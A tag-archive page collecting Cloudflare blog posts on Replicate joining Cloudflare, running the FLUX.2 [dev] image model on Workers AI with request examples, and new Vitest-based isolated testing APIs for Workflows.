Tag Archives: Developers

Why Replicate is joining Cloudflare

Post Syndicated from Andreas Jansson original https://blog.cloudflare.com/why-replicate-joining-cloudflare/

We’re happy to announce that as of today Replicate is officially part of Cloudflare.

When we started Replicate in 2019, OpenAI had just open sourced GPT-2, and few people outside of the machine learning community paid much attention to AI. But for those of us in the field, it felt like something big was about to happen. Remarkable models were being created in academic labs, but you needed a metaphorical lab coat to be able to run them.

We made it our mission to get research models out of the lab into the hands of developers. We wanted programmers to creatively bend and twist these models into products that the researchers would never have thought of.

We approached this as a tooling problem. Just as Heroku made it possible to run websites without managing web servers, we wanted to build tools for running models without having to understand backpropagation or deal with CUDA errors.

The first tool we built was Cog: a standard packaging format for machine learning models. Then we built Replicate as the platform to run Cog models as API endpoints in the cloud. We abstracted away both the low-level machine learning and the complicated GPU cluster management you need to run inference at scale.

It turns out the timing was just right. When Stable Diffusion was released in 2022, we had mature infrastructure that could handle the massive developer interest in running these models. A ton of fantastic apps and products were built on Replicate, often running a single model packaged in a slick UI to solve a particular use case.

Since then, AI engineering has matured into a serious craft. AI apps are no longer just about running models. The modern AI stack includes model inference, but also microservices, content delivery, object storage, caching, databases, telemetry, and more. We see many of our customers building complex, heterogeneous stacks where Replicate models are one part of a higher-order system that spans several platforms.

This is why we’re joining Cloudflare. Replicate has the tools and primitives for running models. Cloudflare has the best network, Workers, R2, Durable Objects, and all the other primitives you need to build a full AI stack.

The AI stack lives entirely on the network. Models run on data center GPUs and are glued together by small cloud functions that call out to vector databases, fetch objects from blob storage, call MCP servers, etc. “The network is the computer” has never been more true.

At Cloudflare, we’ll now be able to build the AI infrastructure layer we have dreamed of since we started. We’ll be able to do things like run fast models on the edge, run model pipelines on instantly-booting Workers, stream model inputs and outputs with WebRTC, etc.

We’re proud of what we’ve built at Replicate. We were the first generative AI serving platform, and we defined the abstractions and design patterns that most of our peers have adopted. We’ve grown a wonderful community of builders and researchers around our product.

Partnering with Black Forest Labs to bring FLUX.2 [dev] to Workers AI

Post Syndicated from Michelle Chen original https://blog.cloudflare.com/flux-2-workers-ai/

In recent months, closed-source image generation models have taken a leap forward with Google’s Nano Banana and OpenAI’s image generation models. Today, we’re happy to share that open weights are back in the race: Black Forest Labs’ FLUX.2 [dev] has launched and is available to run on Workers AI, Cloudflare’s inference platform. You can read more about the model in BFL’s launch blog post.

We have been huge fans of Black Forest Labs’ FLUX image models since their earliest versions. Our hosted version of FLUX.1 [schnell] is one of the most popular models in our catalog for its photorealistic outputs and high-fidelity generations. When the time came to host the licensed version of their new model, we jumped at the opportunity. FLUX.2 takes the best features of FLUX.1 and amps them up, generating even more realistic, grounded images with added customization support such as JSON prompting.

Our Workers AI-hosted version of FLUX.2 has a few specific patterns: it uses multipart form data to accept input images (up to four images of 512×512), and it produces output images of up to 4 megapixels. The multipart format lets you send multiple image inputs alongside the usual model parameters. Check out our developer docs changelog announcement to learn how to use the FLUX.2 model.
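These limits are easy to check on the client before a request is sent. The following is a minimal TypeScript sketch, assuming that 512×512 is a per-image maximum and reading "4 megapixels" as 4,000,000 output pixels; `checkFlux2Request` and its shape are hypothetical and not part of the Workers AI API.

```typescript
// Hypothetical pre-flight check for a FLUX.2 [dev] request on Workers AI.
// Assumed limits (from the prose above; confirm against the docs):
//   - at most 4 reference images
//   - each reference image at most 512x512
//   - output at most 4 megapixels, read here as 4,000,000 pixels
const MAX_INPUT_IMAGES = 4;
const MAX_INPUT_SIDE = 512;
const MAX_OUTPUT_PIXELS = 4_000_000;

interface Dimensions {
  width: number;
  height: number;
}

// Returns a list of human-readable problems; an empty list means the
// request fits the assumed limits.
function checkFlux2Request(inputs: Dimensions[], output: Dimensions): string[] {
  const problems: string[] = [];
  if (inputs.length > MAX_INPUT_IMAGES) {
    problems.push(`too many input images: ${inputs.length} > ${MAX_INPUT_IMAGES}`);
  }
  inputs.forEach((img, i) => {
    if (img.width > MAX_INPUT_SIDE || img.height > MAX_INPUT_SIDE) {
      problems.push(
        `input_image_${i} is ${img.width}x${img.height}, larger than ${MAX_INPUT_SIDE}x${MAX_INPUT_SIDE}`,
      );
    }
  });
  const outputPixels = output.width * output.height;
  if (outputPixels > MAX_OUTPUT_PIXELS) {
    problems.push(`output ${output.width}x${output.height} exceeds ${MAX_OUTPUT_PIXELS} pixels`);
  }
  return problems;
}
```

For example, one 512×512 reference image with a 1024×1024 output passes, while a 4096×4096 output is flagged.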

What makes FLUX.2 special? Physical world grounding, digital world assets, and multi-language support

The FLUX.2 model has a more robust understanding of the physical world, allowing you to turn abstract concepts into photorealistic images. It excels at realistic detail and consistently delivers accurate hands, faces, fabrics, logos, and small objects that other models often get wrong. Its knowledge of the physical world also gives it lifelike lighting, angles, and depth perception.


Figure 1. Image generated with FLUX.2 featuring accurate lighting, shadows, reflections and depth perception at a café in Paris.

This high-fidelity output makes it ideal for applications requiring superior image quality, such as creative photography, e-commerce product shots, marketing visuals, and interior design. Because it can understand context, tone, and trends, the model allows you to create engaging and editorial-quality digital assets from short prompts.

Beyond the physical world, the model can also generate high-quality digital assets, such as landing page designs or detailed infographics (see the example below). It also understands multiple languages natively, so by combining these two features, we can get a polished landing page in French from a French prompt:

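Générer une page web visuellement immersive pour un service de promenade de chiens. L'image principale doit dominer l'écran, montrant un chien exubérant courant dans un parc ensoleillé, avec des touches de vert vif (#2ECC71) intégrées subtilement dans le feuillage ou les accessoires du chien. Minimiser le texte pour un impact visuel maximal.
(English translation: Generate a visually immersive web page for a dog-walking service. The main image should dominate the screen, showing an exuberant dog running in a sunny park, with touches of bright green (#2ECC71) subtly integrated into the foliage or the dog's accessories. Minimize text for maximum visual impact.)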

Character consistency – solving for stochastic drift

FLUX.2 offers multi-reference editing with state-of-the-art character consistency, keeping identities, products, and styles consistent across generations. In generative AI, getting one high-quality image is easy; getting the exact same character or product twice has always been the hard part. This is known as “stochastic drift”: generated images drift away from the original source material.


Figure 2. Stochastic drift infographic (generated on FLUX.2)

One of FLUX.2’s breakthroughs is multi-reference image inputs designed to solve this consistency challenge. You’ll have the ability to change the background, lighting, or pose of an image without accidentally changing the face of your model or the design of your product. You can also reference other images or combine multiple images together to create something new. 

In code, Workers AI supports multi-reference images (up to 4) through a multipart form-data upload. The image inputs are sent as binary files, and the output is a base64-encoded image:

curl --request POST \
  --url 'https://api.cloudflare.com/client/v4/accounts/{ACCOUNT}/ai/run/@cf/black-forest-labs/flux-2-dev' \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: multipart/form-data' \
  --form 'prompt=take the subject of image 2 and style it like image 1' \
  --form input_image_0=@/Users/johndoe/Desktop/icedoutkeanu.png \
  --form input_image_1=@/Users/johndoe/Desktop/me.png \
  --form steps=25 \
  --form width=1024 \
  --form height=1024

We also support this through the Workers AI Binding:

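// Runs inside a Worker with a Workers AI binding named AI.
export default {
  async fetch(request, env) {
    // Fetch a reference image (placeholder URL) and read it as a Blob
    const image = await fetch("http://image-url");
    const imageBlob = await image.blob();
    const form = new FormData();
    form.append("input_image_0", imageBlob);
    form.append("prompt", "a sunset with the dog in the original image");

    // Serializing the form through a Response yields the encoded body plus a
    // Content-Type header that includes the multipart boundary
    const encoded = new Response(form);

    const resp = await env.AI.run("@cf/black-forest-labs/flux-2-dev", {
      multipart: {
        body: encoded.body,
        contentType: encoded.headers.get("content-type"),
      },
    });

    // resp contains the generated image, base64-encoded
    return Response.json(resp);
  },
};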
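A multipart body can only be parsed together with its boundary, which travels in the Content-Type header. The sketch below packages a prompt and several reference images into the `{ body, contentType }` pair used by the binding call, using only the standard FormData and Response APIs. It assumes the field names shown in this post (`prompt`, `input_image_N`, `steps`, `width`, `height`); `buildFlux2Multipart` is a hypothetical helper name.

```typescript
// Hypothetical helper: packages a prompt plus up to four reference images
// into the { body, contentType } pair passed as the `multipart` option.
function buildFlux2Multipart(
  prompt: string,
  images: Blob[],
  options: { steps?: number; width?: number; height?: number } = {},
) {
  if (images.length > 4) {
    throw new Error(`FLUX.2 accepts at most 4 reference images, got ${images.length}`);
  }
  const form = new FormData();
  form.append("prompt", prompt);
  // Reference images are numbered input_image_0 ... input_image_3.
  images.forEach((blob, i) => form.append(`input_image_${i}`, blob, `image_${i}.png`));
  for (const [key, value] of Object.entries(options)) {
    if (value !== undefined) form.append(key, String(value));
  }
  // Serializing through a Response produces the encoded body and a
  // Content-Type header that carries the multipart boundary.
  const encoded = new Response(form);
  const contentType = encoded.headers.get("content-type");
  if (contentType === null) throw new Error("FormData serialization produced no Content-Type");
  return { body: encoded.body, contentType };
}
```

Inside a Worker, the result can be passed directly as `{ multipart: buildFlux2Multipart(prompt, [imageBlob]) }` to `env.AI.run`.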

Built for real world use cases

The newest image model signifies a shift towards functional business use cases, moving beyond simple image quality improvements. FLUX.2 enables you to:

  • Create Ad Variations: Generate 50 different advertisements using the exact same actor, without their face morphing between frames.

  • Trust Your Product Shots: Drop your product on a model, or into a beach scene, a city street, or a studio table. The environment changes, but your product stays accurate.

  • Build Dynamic Editorials: Produce a full fashion spread where the model looks identical in every single shot, regardless of the angle.


Figure 3. Combining the oversized hoodie and sweatpants ad photo (generated with FLUX.2) with Cloudflare’s logo to create product renderings with consistent faces, fabrics, and scenery. Note: we also prompted for the Cloudflare lettering in white instead of the original black.

Granular controls — JSON prompting, HEX codes and more!

The FLUX.2 model also lets users control small details in images through JSON prompting and exact hex color codes.

For example, you could send this JSON as a prompt (as part of the multipart form input) and the resulting image follows the prompt exactly:


{
  "scene": "A bustling, neon-lit futuristic street market on an alien planet, rain slicking the metal ground",
  "subjects": [
    {
      "type": "Cyberpunk bounty hunter",
      "description": "Female, wearing black matte armor with glowing blue trim, holding a deactivated energy rifle, helmet under her arm, rain dripping off her synthetic hair",
      "pose": "Standing with a casual but watchful stance, leaning slightly against a glowing vendor stall",
      "position": "foreground"
    },
    {
      "type": "Merchant bot",
      "description": "Small, rusted, three-legged drone with multiple blinking red optical sensors, selling glowing synthetic fruit from a tray attached to its chassis",
      "pose": "Hovering slightly, offering an item to the viewer",
      "position": "midground"
    }
  ],
  "style": "noir sci-fi digital painting",
  "color_palette": [
    "deep indigo",
    "electric blue",
    "acid green"
  ],
  "lighting": "Low-key, dramatic, with primary light sources coming from neon signs and street lamps reflecting off wet surfaces",
  "mood": "Gritty, tense, and atmospheric",
  "background": "Towering, dark skyscrapers disappearing into the fog, with advertisements scrolling across their surfaces, flying vehicles (spinners) visible in the distance",
  "composition": "dynamic off-center",
  "camera": {
    "angle": "eye level",
    "distance": "medium close-up",
    "focus": "sharp on subject",
    "lens": "35mm",
    "f-number": "f/1.4",
    "ISO": 400
  },
  "effects": [
    "heavy rain effect",
    "subtle film grain",
    "neon light reflections",
    "mild chromatic aberration"
  ]
}

To take it further, we can ask the model to recolor the accent lighting to a Cloudflare orange by giving it a specific hex code like #F48120.
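Because the JSON prompt travels as the ordinary `prompt` field of the multipart form, it only needs `JSON.stringify` before being appended. The sketch below also shows one way to fold in an exact accent color. The `JsonPrompt` type is a partial, hypothetical description of the example above, and putting the hex code into `color_palette` and `lighting` is an illustrative assumption, not a documented schema.

```typescript
// A small, hypothetical subset of the JSON prompt shown above.
interface JsonPrompt {
  scene: string;
  style?: string;
  color_palette?: string[];
  lighting?: string;
  [key: string]: unknown;
}

const HEX_COLOR = /^#[0-9A-Fa-f]{6}$/;

// Returns a copy of the prompt with an exact accent color added.
// Where the hex code goes (palette + lighting text) is an illustrative choice.
function withAccentColor(prompt: JsonPrompt, hex: string): JsonPrompt {
  if (!HEX_COLOR.test(hex)) {
    throw new Error(`expected a 6-digit hex color like #F48120, got "${hex}"`);
  }
  return {
    ...prompt,
    color_palette: [...(prompt.color_palette ?? []), hex],
    lighting: `${prompt.lighting ?? ""} Accent lighting in ${hex}.`.trim(),
  };
}

// The JSON prompt is sent as the string-valued "prompt" form field.
function jsonPromptForm(prompt: JsonPrompt): FormData {
  const form = new FormData();
  form.append("prompt", JSON.stringify(prompt));
  return form;
}
```

Validating the hex code up front means a typo such as `#F4812` fails locally instead of silently producing a differently colored image.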


Try it out today!

The newest FLUX.2 [dev] model is now available on Workers AI — you can get started with the model through our developer docs or test it out on our multimodal playground.


Replicate is joining Cloudflare

Post Syndicated from Rita Kozlov original https://blog.cloudflare.com/replicate-joins-cloudflare/

We have some big news to share today: Replicate, the leading platform for running AI models, is joining Cloudflare.

We first started talking to Replicate because we shared a lot in common beyond just a passion for bright color palettes. Our mission for Cloudflare’s Workers developer platform has been to make building and deploying full-stack applications as easy as possible. Meanwhile, Replicate has been on a similar mission to make deploying AI models as easy as writing a single line of code. And we realized we could build something even better together by integrating the Replicate platform into Cloudflare directly.

We are excited to share this news and even more excited for what it will mean for customers. Bringing Replicate’s tools into Cloudflare will continue to make our Developer Platform the best place on the Internet to build and deploy any AI or agentic workflow.

What does this mean for you? 

Before we spend more time talking about the future of AI, we want to answer the questions that are top of mind for Replicate and Cloudflare users. In short: 

For existing Replicate users: Your APIs and workflows will continue to work without interruption. You will soon benefit from the added performance and reliability of Cloudflare’s global network.

For existing Workers AI users: Get ready for a massive expansion of the model catalog and the new ability to run fine-tunes and custom models directly on Workers AI.

Now – let’s get back into why we’re so excited about our joint future.

The AI Revolution was not televised, but it started with open source

Before AI was AI, and the subject of every conversation, it was known for decades as “machine learning”. It was a specialized, almost academic field. Progress was steady but siloed, with breakthroughs happening inside a few large, well-funded research labs. The models were monolithic, the data was proprietary, and the tools were inaccessible to most developers. Everything changed when the culture of open-source collaboration — the same force that built the modern Internet — collided with machine learning, as researchers and companies began publishing not just their papers, but their model weights and code.

This ignited an incredible explosion of innovation. The pace of change in just the past few years has been staggering; what was state-of-the-art 18 months ago (or sometimes it feels like just days ago) is now the baseline. This acceleration is most visible in generative AI. 

We went from uncanny, blurry curiosities to photorealistic image generation in what felt like the blink of an eye. Open source models like Stable Diffusion unlocked immediate creativity for developers, and that was just the beginning. If you take a look at Replicate’s model catalog today, you’ll see thousands of image models of almost every flavor, each iterating on the previous. 

The same thing happened beyond images, with video, audio, language models, and more.

But this incredible, community-driven progress creates a massive practical challenge: How do you actually run these models? Every new model has different dependencies, requires specific GPU hardware (and enough of it), and needs a complex serving infrastructure to scale. Developers found themselves spending more time fighting with CUDA drivers and requirements.txt files than actually building their applications.

This is exactly the problem Replicate solved. They built a platform that abstracts away all that complexity (using their open-source tool Cog to package models into standard, reproducible containers), letting any developer or data scientist run even the most complex open-source models with a simple API call. 

Today, Replicate’s catalog spans more than 50,000 open-source and fine-tuned models. While open source unlocked so many possibilities, Replicate’s toolset goes beyond that, making it possible for developers to access any model they need in one place. Period. With their marketplace, they also offer seamless access to leading proprietary models like GPT-5 and Claude Sonnet, all through the same unified API.

What’s worth noting is that Replicate didn’t just build an inference service; they built a community. So much innovation happens through being inspired by what others are doing, iterating on it, and making it better. Replicate has become the definitive hub for developers to discover, share, fine-tune, and experiment with the latest models in a public playground. 

Stronger together: the AI catalog meets the AI cloud

Coming back to the Workers Platform mission: Our goal all along has been to enable developers to build full-stack applications without having to burden themselves with infrastructure. And while that hasn’t changed, AI has changed the requirements of applications.

The types of applications developers are building are changing — three years ago, no one was building agents or creating AI-generated launch videos. Today they are. As a result, what they need and expect from the cloud, or the AI cloud, has changed too.

To meet the needs of developers, Cloudflare has been building the foundational pillars of the AI Cloud, designed to run inference at the edge, close to users. This isn’t just one product, but an entire stack:

  • Workers AI: Serverless GPU inference on our global network.

  • AI Gateway: A control plane for caching, rate-limiting, and observing any AI API.

  • Data Stack: Including Vectorize (our vector database) and R2 (for model and data storage).

  • Orchestration: Tools like AI Search (formerly AutoRAG), Agents, and Workflows to build complex, multi-step applications.

  • Foundation: All built on our core developer platform of Workers, Durable Objects, and the rest of our stack.

As we’ve been helping developers scale up their applications, Replicate has been on a similar mission: to make deploying AI models as easy as deploying code. This is where it all comes together. Replicate brings one of the industry’s largest and most vibrant model catalogs and developer communities. Cloudflare brings an incredibly performant global network and serverless inference platform. Together, we can deliver the best of both worlds: the most comprehensive selection of models, runnable on a fast, reliable, and affordable inference platform.

Our shared vision

For the community: the hub for AI exploration

The ability to share models, publish fine-tunes, collect stars, and experiment in the playground is the heart of the Replicate community. We will continue to invest in and grow this as the premier destination for AI discovery and experimentation, now supercharged by Cloudflare’s global network for an even faster, more responsive experience for everyone.

The future of inference: one platform, all models

Our vision is to bring the best of both platforms together. We will bring the entire Replicate catalog — all 50,000+ models and fine-tunes — to Workers AI. This gives you the ultimate choice: run models in Replicate’s flexible environment or on Cloudflare’s serverless platform, all from one place.

But we’re not just expanding the catalog. We are thrilled to announce that we will be bringing fine-tuning capabilities to Workers AI, powered by Replicate’s deep expertise. We are also making Workers AI more flexible than ever. Soon, you’ll be able to bring your own custom models to our network. We’ll leverage Replicate’s expertise with Cog to make this process seamless, reproducible, and easy.

The AI Cloud: more than just inference

Running a model is just one piece of the puzzle. The real magic happens when you connect AI to your entire application. Imagine what you can build when Replicate’s massive catalog is deeply integrated with the entire Cloudflare developer platform: run a model and store the results directly in R2 or Vectorize; trigger inference from a Worker or Queue; use Durable Objects to manage state for an AI agent; or build real-time generative UI with WebRTC and WebSockets.
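As a rough illustration of "run a model and store the results directly in R2", the core of such a Worker might look like the sketch below. It assumes an AI binding named `AI`, an R2 bucket binding named `IMAGES`, the existing `@cf/black-forest-labs/flux-1-schnell` model, a response shaped like `{ image: <base64 string> }`, and a JPEG content type. The minimal binding interfaces are declared inline (and are hypothetical simplifications) so the logic can be exercised with stand-ins.

```typescript
// Minimal structural stand-ins for the Workers AI and R2 bindings
// (the real types come from @cloudflare/workers-types).
interface AiBinding {
  run(model: string, inputs: Record<string, unknown>): Promise<unknown>;
}
interface BucketBinding {
  put(key: string, value: Uint8Array, options?: { httpMetadata?: { contentType?: string } }): Promise<unknown>;
}
interface Env {
  AI: AiBinding;
  IMAGES: BucketBinding;
}

// Generates an image and stores it in R2 under `key`; returns the stored size.
async function generateAndStore(env: Env, prompt: string, key: string): Promise<number> {
  // Assumption: the model responds with { image: "<base64-encoded image>" }.
  const result = (await env.AI.run("@cf/black-forest-labs/flux-1-schnell", { prompt })) as { image?: string };
  if (typeof result.image !== "string") throw new Error("model response had no image field");
  // Decode base64 into raw bytes before writing to object storage.
  const bytes = Uint8Array.from(atob(result.image), (c) => c.charCodeAt(0));
  // The content type is an assumption about the model's output format.
  await env.IMAGES.put(key, bytes, { httpMetadata: { contentType: "image/jpeg" } });
  return bytes.byteLength;
}
```

In a deployed Worker, `fetch` or a Queue consumer would call `generateAndStore(env, prompt, key)` and could then index the key in Vectorize or hand it to a Durable Object.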

To manage all this, we will integrate our unified inference platform deeply with the AI Gateway, giving you a single control plane for observability, prompt management, A/B testing, and cost analytics across all your models, whether they’re running on Cloudflare, Replicate, or any other provider.

Welcome to the team!

We are incredibly excited to welcome the Replicate team to Cloudflare. Their passion for the developer community and their expertise in the AI ecosystem are unmatched. We can’t wait to build the future of AI together.

Building a better testing experience for Workflows, our durable execution engine for multi-step applications

Post Syndicated from Olga Silva original https://blog.cloudflare.com/better-testing-for-workflows/

Cloudflare Workflows is our take on “Durable Execution.” They provide a serverless engine, powered by the Cloudflare Developer Platform, for building long-running, multi-step applications that persist through failures. When Workflows became generally available earlier this year, they allowed developers to orchestrate complex processes that would be difficult or impossible to manage with traditional stateless functions. Workflows handle state, retries, and long waits, allowing you to focus on your business logic.

However, complex orchestrations require robust testing to be reliable. Until now, testing Workflows was a black-box process. Although you could check whether a Workflow instance reached completion by awaiting its status, there was no visibility into the intermediate steps. This made debugging really difficult. Did the payment processing step succeed? Did the confirmation email step receive the correct data? You couldn’t be sure without inspecting external systems or logs.

Why was this necessary?

As developers ourselves, we understand the need to ensure reliable code, and we heard your feedback loud and clear: the developer experience for testing Workflows needed to be better.

The black box nature of testing was one part of the problem. Beyond that, though, the limited testing offered came at a high cost. If you added a workflow to your project, even if you weren’t testing the workflow directly, you were required to disable isolated storage because we couldn’t guarantee isolation between tests. Isolated storage is a vitest-pool-workers feature to guarantee that each test runs in a clean, predictable environment, free from the side effects of other tests. Being forced to have it disabled meant that state could leak between tests, leading to flaky, unpredictable, and hard-to-debug failures.

This created a difficult choice for developers building complex applications. If your project used Workers, Durable Objects, and R2 alongside Workflows, you had to either abandon isolated testing for your entire project or skip testing. This friction resulted in a poor testing experience, which in turn discouraged the adoption of Workflows. Solving this wasn’t just an improvement, it was a critical step in making Workflows part of any well-tested Cloudflare application.

Introducing isolated testing for Workflows

We’re introducing a new set of APIs that enable comprehensive, granular, and isolated testing for your Workflows, all running locally and offline with vitest-pool-workers, our Vitest integration that runs tests inside workerd, the Workers runtime. This makes test runs fast, reliable, and cheap, with no dependency on a network connection.

They are available through the cloudflare:test module, with @cloudflare/vitest-pool-workers version 0.9.0 and above. The new test module provides two primary functions to introspect your Workflows:

  • introspectWorkflowInstance: useful for unit tests with known instance IDs

  • introspectWorkflow: useful for integration tests where IDs are typically generated dynamically.

Let’s walk through a practical example.

A practical example: testing a blog moderation workflow

Imagine a simple Workflow for moderating blog comments. When a user submits a comment, the Workflow asks Workers AI to review it. Depending on the violation score returned, it then waits for a moderator to approve or deny the comment. If the comment is approved, a step.do step publishes it via an external API.
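For reference, the Workflow under test might look roughly like the sketch below. It is a hypothetical reconstruction, not the code behind this post: the step names and event type match the tests that follow, while the score thresholds, payload shapes, timeout, the "wait for moderator" step name, and the injected `scan`/`publish` functions are assumptions. The step API is declared as a small local interface so the logic runs outside workerd; in a real project this body would live in the `run(event, step)` method of a class extending `WorkflowEntrypoint` from `cloudflare:workers`.

```typescript
// Subset of the Workflows step API used here (structural, for illustration).
interface StepLike {
  do<T>(name: string, callback: () => Promise<T>): Promise<T>;
  waitForEvent<T>(name: string, options: { type: string; timeout?: string }): Promise<{ payload: T }>;
}

interface ModerationDeps {
  scan(comment: string): Promise<{ violationScore: number }>; // e.g. a Workers AI call
  publish(comment: string): Promise<{ status: string }>; // e.g. an external blog API
}

// Hypothetical thresholds: low scores publish directly, high scores are
// rejected, and anything in between waits for a human moderator.
const AUTO_APPROVE_BELOW = 10;
const AUTO_REJECT_ABOVE = 90;

async function moderateComment(step: StepLike, deps: ModerationDeps, comment: string): Promise<string> {
  const { violationScore } = await step.do("AI content scan", () => deps.scan(comment));

  if (violationScore > AUTO_REJECT_ABOVE) return "rejected";

  if (violationScore >= AUTO_APPROVE_BELOW) {
    const approval = await step.waitForEvent<{ action: "approved" | "denied" }>("wait for moderator", {
      type: "moderation-approval",
      timeout: "24 hours",
    });
    if (approval.payload.action !== "approved") return "rejected";
  }

  const { status } = await step.do("publish comment", () => deps.publish(comment));
  return status;
}
```

With these assumed thresholds, a score of 50 waits for the "moderation-approval" event and a score of 0 publishes immediately, which is exactly the behavior the two tests below mock.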

Without our new APIs, testing this would be impossible: you’d have no direct way to simulate the steps’ outcomes or the moderator’s approval. Now, you can mock everything.

Here’s the test code using introspectWorkflowInstance with a known instance ID:

import { it, expect } from "vitest";
import { env, introspectWorkflowInstance } from "cloudflare:test";

it("should mock an ambiguous score, approve the comment, and complete", async () => {
  // CONFIG: set up introspection before the instance is created
  await using instance = await introspectWorkflowInstance(
    env.MODERATOR,
    "my-workflow-instance-id-123"
  );
  await instance.modify(async (m) => {
    // Mock the Workers AI call with a score that requires human review
    await m.mockStepResult({ name: "AI content scan" }, { violationScore: 50 });
    // Simulate the moderator's approval event
    await m.mockEvent({
      type: "moderation-approval",
      payload: { action: "approved" },
    });
    // Mock the call to the external blog API
    await m.mockStepResult({ name: "publish comment" }, { status: "published" });
  });

  await env.MODERATOR.create({ id: "my-workflow-instance-id-123" });

  // ASSERTIONS
  expect(await instance.waitForStepResult({ name: "AI content scan" })).toEqual(
    { violationScore: 50 }
  );
  expect(
    await instance.waitForStepResult({ name: "publish comment" })
  ).toEqual({ status: "published" });

  await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});

This test mocks the outcomes of steps that require external API calls, such as the ‘AI content scan’, which calls Workers AI, and the ‘publish comment’ step, which calls an external blog API.

If the instance ID is not known in advance, for example because a Worker request starts one or more Workflow instances with randomly generated IDs, you can call introspectWorkflow(env.MY_WORKFLOW). Here’s the test code for that scenario, where only one Workflow instance is created:

import { it, expect } from "vitest";
import { env, introspectWorkflow, SELF } from "cloudflare:test";

it("should mock a non-violation score and complete successfully", async () => {
  // CONFIG: intercept every instance of this Workflow created during the test
  await using introspector = await introspectWorkflow(env.MODERATOR);
  await introspector.modifyAll(async (m) => {
    await m.disableSleeps();
    await m.mockStepResult({ name: "AI content scan" }, { violationScore: 0 });
  });

  // Hit the Worker route that creates the instance (its ID is generated at runtime)
  await SELF.fetch(`https://mock-worker.local/moderate`);

  const instances = introspector.get();
  expect(instances.length).toBe(1);

  // ASSERTIONS
  const instance = instances[0];
  expect(await instance.waitForStepResult({ name: "AI content scan" })).toEqual({ violationScore: 0 });
  await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});

Notice that in both examples we call the introspectors with await using: this is the Explicit Resource Management syntax from modern JavaScript. It is crucial here because when an introspector goes out of scope at the end of the test, its disposal method is called automatically. This is how we ensure each test works with its own isolated storage.
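If `await using` is unfamiliar, it helps to see what it saves you from writing. The sketch below is plain TypeScript with a hypothetical `FakeIntrospector` standing in for the real introspector. `withResource` spells out the try/finally that an `await using` declaration performs for you. The real mechanism calls the object's `[Symbol.asyncDispose]()` method; here an ordinary `dispose()` method takes its place so the example runs on older runtimes.

```typescript
// Hypothetical stand-in for an introspector: it records whether it was cleaned up.
class FakeIntrospector {
  disposed = false;
  async dispose(): Promise<void> {
    // In the real API, disposal is what keeps each test's storage isolated
    // and, for introspectWorkflow, removes the binding proxy.
    this.disposed = true;
  }
}

// Roughly what `await using x = await acquire();` does: run the body, then
// always dispose of the resource, even if the body throws.
async function withResource<R extends { dispose(): Promise<void> }, T>(
  acquire: () => Promise<R>,
  body: (resource: R) => Promise<T>,
): Promise<T> {
  const resource = await acquire();
  try {
    return await body(resource);
  } finally {
    await resource.dispose();
  }
}
```

In a test, the hand-written equivalent is `const introspector = await introspectWorkflow(env.MODERATOR); try { ... } finally { await introspector.dispose(); }`, which can be useful if your toolchain does not yet compile `await using`.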

The modify and modifyAll functions are the gateway to controlling instances. Inside their callback, you get a modifier object with methods to inject behavior, such as mocking step results and events or disabling sleeps.

You can find detailed documentation in the Cloudflare Workers docs.

How we connected Vitest to the Workflows Engine

To understand the solution, you first need to understand the local architecture. When you run wrangler dev, your Workflows are powered by Miniflare, a simulator for testing Cloudflare Workers, and workerd. Each running workflow instance is backed by its own SQLite Durable Object, which we call the “Engine DO”. This Engine DO is responsible for executing steps, persisting state, and managing the instance’s lifecycle. It lives inside the local isolated Workers runtime.

Meanwhile, the Vitest test runner is a separate Node.js process that lives outside of workerd. This is why vitest-pool-workers exists: it is a custom Vitest pool that runs tests inside workerd. It includes a Runner Worker that executes the tests and has bindings to everything declared in the user’s wrangler.json file. This worker has access to the APIs in the “cloudflare:test” module, and it communicates with Node.js through a special Durable Object, the Runner Object, over WebSocket/RPC.

The first approach we considered was to use the Runner Worker, which already has access to the bindings for the Workflows defined in the Wrangler file. We considered also binding each Workflow’s Engine DO namespace to the Runner Worker. This would give vitest-pool-workers direct access to the Engine DOs, so it could call Engine methods directly.


While promising, this approach would have required undesirable changes to the core of Miniflare and vitest-pool-workers, making it too invasive for this single feature. 

Firstly, we would have needed to add a new unsafe field to Miniflare’s Durable Objects. Its sole purpose would be to specify the service name of our Engines, preventing Miniflare from applying its default user prefix which would otherwise prevent the Durable Objects from being found.

Secondly, vitest-pool-workers would have been forced to bind every Engine DO from the project’s Workflows to its runner, even those not being tested. This would introduce unwanted bindings into the test environment, requiring additional cleanup to ensure they were not exposed in the user’s test env.

The breakthrough

The solution is a combination of privileged local-only APIs and Remote Procedure Calls (RPC).

First, we added a set of unsafe functions to the local implementation of the Workflows binding, functions that are not available in the production environment. They act as a controlled access point, accessible from the test environment, allowing the test runner to get a stub to a specific Engine DO by providing its instance ID.

Once the test runner has this stub, it uses RPC to call specific, trusted methods on the Engine DO through a special RpcTarget called WorkflowInstanceModifier. When an object whose class extends RpcTarget is sent over RPC, the receiving side gets a stub instead of a copy; calling a method on that stub makes an RPC back to the original object.


This simpler approach is far less invasive because it’s confined to the Workflows environment, which also ensures any future feature changes are safely isolated.

Introspecting Workflows with unknown IDs

When creating Workflows instances (either by create() or createBatch()) developers can provide a specific ID or have it automatically generated for them. This ID identifies the Workflow instance and is then used to create the associated Engine DO ID.

The logical starting point for implementation was introspectWorkflowInstance(binding, instanceID), as the instance ID is known in advance. This allows us to generate the Engine DO ID required to identify the engine associated with that Workflow instance.

But often, one part of your application (like an HTTP endpoint) will create a Workflow instance with a randomly generated ID. How can we introspect an instance when we don’t know its ID until after it’s created?

The answer was to use a powerful feature of JavaScript: Proxy objects.

When you use introspectWorkflow(binding), we wrap the Workflow binding in a Proxy. This proxy non-destructively intercepts all calls to the binding, specifically looking for .create() and .createBatch(). When your test triggers a workflow creation, the proxy inspects the call. It captures the instance ID — either one you provided or the random one generated — and immediately sets up the introspection on that ID, applying all the modifications you defined in the modifyAll call. The original creation call then proceeds as normal.

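// Simplified excerpt: introspectAndModifyInstance stands for the internal step
// that sets up introspection and applies the modifyAll() changes for one ID.
env[workflow] = new Proxy(env[workflow], {
  get(target, prop, receiver) {
    if (prop === "create") {
      return new Proxy(target.create, {
        async apply(_fn, _this, [opts = {}]) {

          // 1. Ensure an ID exists
          const optsWithId = "id" in opts ? opts : { id: crypto.randomUUID(), ...opts };

          // 2. Apply test modifications before creation
          await introspectAndModifyInstance(optsWithId.id);

          // 3. Call the original 'create' method
          return target.create(optsWithId);
        },
      });
    }

    // Same logic for createBatch()

    // Every other property passes through to the original binding
    return Reflect.get(target, prop, receiver);
  },
});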

